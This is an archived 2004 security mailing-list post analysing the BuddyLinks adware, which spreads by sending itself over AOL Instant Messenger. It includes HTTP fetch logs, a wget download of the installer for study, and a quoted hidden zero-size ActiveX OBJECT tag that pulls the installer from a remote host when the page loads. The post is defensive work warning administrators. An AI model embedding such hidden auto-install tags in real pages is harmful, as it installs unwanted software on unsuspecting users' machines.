[DShield] AOL IM auto-sending BuddyLinks OCX

Erik van Straten emvs.dsh.3FB4CC72 at cpo.tn.tudelft.nl
Wed Feb 11 13:16:02 GMT 2004


Internap/Exodus Abuse, DShield List,

I fetched the AOL IM auto-sending "BuddyLinks" OCX (ActiveX component).
I am not saying that this is a virus, although there seem to be some
similarities. The manufacturer denies this, as shown below. Meanwhile
McAfee recognizes it as an adware product (URL at the end of this mail).

I'm sending this message because possibly the sites mentioned below are
in violation with their provider's AUP's, and to the list, in order to
warn admins that this product may initiate undesired connections, and
perhaps generate excessive network traffic; also installation of such
software may be considered a compromise in security, in particular on
corporate PC's.

>From http://www.buddylinks.net/ (20040211 1330 +0100):
> Welcome to Buddylinks.net!
> February 10, 2004 
>
> We are proud to announce our latest release, The WGUTV Osama Game, "Run
> Saddam Run"! Help President Bush trick Osama and Saddam into working for
> the USA!
>
> Our game has grown so fast that we have received some emails and phone
> calls asking about the nature of our flash games. Our games interact
> with instant messengers by promoting the game among the user's network
> of buddies. Please understand, our flash games are in no way a virus. We
> simply combine peer-to-peer, social networking, and instant messaging
> into one spectacular technology.
[snip]
> 1 Get BuddyLinks
> install BuddyLinks in your Instant Messenger
>
> 2 Send Friends funny news
> Soon your Instant Messenger will begin sending your friends funny
> news messages like this
>
> 3 Open the prize
> Your friends will love the prize they receive in their fully news
> message. It might be a game or a funny flash cartoon.
[snip]

I may be mistaken, but this doesn't seem like decent Internet behavior,
(especially youngsters may unintentionally hit the wrong button) and it
may be in violation with either Internap's and/or Exodus' AUP's.

**Possibly** the following site is compromised:
------------------------------------------
wgutv.com [63.251.131.235]
Internap Network Services NETBLK-PNAP-11-99 (NET-63-251-0-0-1) 
                                  63.251.0.0 - 63.251.255.255
ClickSpring LLC INAP-BSN-CLICKSPRING-0041 (NET-63-251-131-232-1) 
                                  63.251.131.232 - 63.251.131.239
TechName:   InterNap Network Operations Center 
OrgAbuseEmail:  abuse.internap.com
------------------------------------------

The following site(s) owner(s) **may have** other intentions than
advertised:

------------------------------------------
download.buddylinks.net [212.62.17.142], [212.62.17.143]
inetnum:      212.62.17.128 - 212.62.17.191
netname:      SPEEDERA
nic-hdl:      CLAU1-RIPE
remarks:      To report email/network abuses, please send email to
              abuse.exodus.net.
------------------------------------------

Please find a detailed analysis below.

Regards,
Erik van Straten



Detailed analysis:
------------------------------------------
02/11/04 12:26:48 Browsing http://www.wgutv.com/osama_capture.php?lmpZ
Fetching http://www.wgutv.com/osama_capture.php?lmpZ ...
GET /osama_capture.php?lmpZ HTTP/1.1
Host: www.wgutv.com
Connection: close

HTTP/1.1 200 HTTP
Content-Type: text/html
X-Powered-By: PHP/4.3.4
X-Accelerated-By: PHPA/1.3.3r2
Connection: close

[Snip]
  <title>Osama Captured Shortly After Saddam Found</title>
[Snip]
  <OBJECT ID="ShellInstaller" WIDTH=0 HEIGHT=0 
    CLASSID="CLSID:FDDCE9FF-1FC6-413c-80B1-37B101FDA1D4"
    CODEBASE="http://download.buddylinks.net/ShellInstaller.cab#Version=1,0,0,001">
</OBJECT>
[Snip]

> wget.exe http://download.buddylinks.net/ShellInstaller.cab
--12:27:53--  http://download.buddylinks.net/ShellInstaller.cab
           => `ShellInstaller.cab'
Resolving download.buddylinks.net... 212.62.17.143, 213.41.76.73
Connecting to download.buddylinks.net[212.62.17.143]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46,988 [text/plain]

100%[====================================>] 46,988        --.--K/s

12:27:54 (573.58 KB/s) - `ShellInstaller.cab' saved [46988/46988]

Extracted contents of:
02/10/04  07:47p                46,988 ShellInstaller.cab

Results in 2 files:
12/15/03  02:08p                 2,119 ShellInstaller.INF
02/10/04  12:21p                81,920 ShellInstaller.ocx

------------------------------------------
02/11/04 12:34:14 Browsing http://www.wgutv.com/terms.html
Fetching http://www.wgutv.com/terms.html ...
GET /terms.html HTTP/1.1
Host: www.wgutv.com
Connection: close

HTTP/1.1 200 HTTP
Server: thttpd/2.21b PHP/20030920
Content-Type: text/html; charset=iso-8859-1
Date: Wed, 11 Feb 2004 11:42:05 GMT
Last-Modified: Wed, 11 Feb 2004 11:04:23 GMT
Accept-Ranges: bytes
Content-Length: 27634
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>[NAME]</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="MSHTML 6.00.2800.1400" name=GENERATOR>

[Snip/Ed. note: the following line may not belong on this page:]

<P><B>Note: This is not an actual news story. This is the prologue to a Flash video game.</B></P>

<P class=MsoNormal style="LINE-HEIGHT: 12pt; TEXT-ALIGN: center" 
align=center><B><SPAN style="COLOR: black">PSD TOOLS</SPAN></B></P>
<P class=MsoNormal style="LINE-HEIGHT: 12pt; TEXT-ALIGN: center" 
align=center><B><SPAN style="COLOR: black">END USER AGREEMENT AND SOFTWARE 
LICENSE TERMS</SPAN></B></P>

[Snip]
------------------------------------------

References:

On the Intrusions maillist, on Tue, 10 Feb 2004 19:00:16 -0500 (EST) 
Phillip G Deneault of wpi.edu points out that a new kind of virus is
spreading among AOL IM users:
http://cert.uni-stuttgart.de/archive/intrusions/2004/02/msg00062.html
> A student reported that this link was sent to her via AOL Instant
> Messanger:
>
> http://www.wgutv.com/osama_capture.php?lmpZ
>
> A LOT of systems on campus are currently trying to connect to it from my
> Class-B and I cannot connect to anything on the IP address that this URL
> is resolving to(currently 63.251.131.235).
>
> I'm not sure if this is a new virus, but it sure seems like one... or else
> someone really did capture Osama. :-)
>
> Phil

There was a response from Nick Fitzgerald:
http://cert.uni-stuttgart.de/archive/intrusions/2004/02/msg00063.html

Also mentioned here: http://isc.sans.org/diary.html?date=2004-02-10

Part of Network Associates McAfee antivirus description:
http://vil.nai.com/vil/content/v_101007.htm
> SubType:  Adware
> Description Modified:  02/10/2004 9:27 PM (PT)
>
> This is not a virus or trojan. It is an potentially unwanted program
> that requires users to download an installer, agreeing to the terms of
> the program, which includes sending a messages to all users on your AOL
> Instant Messenger buddy list with a link to the installer page.
>
> This application works when visiting the www.wgutv.com or
> download.buddylinks.net websites. A link to these sites arrives in an
> instant message. Once this page has loaded, users are prompted to
> install and run a program.
[snip]




More information about the list mailing list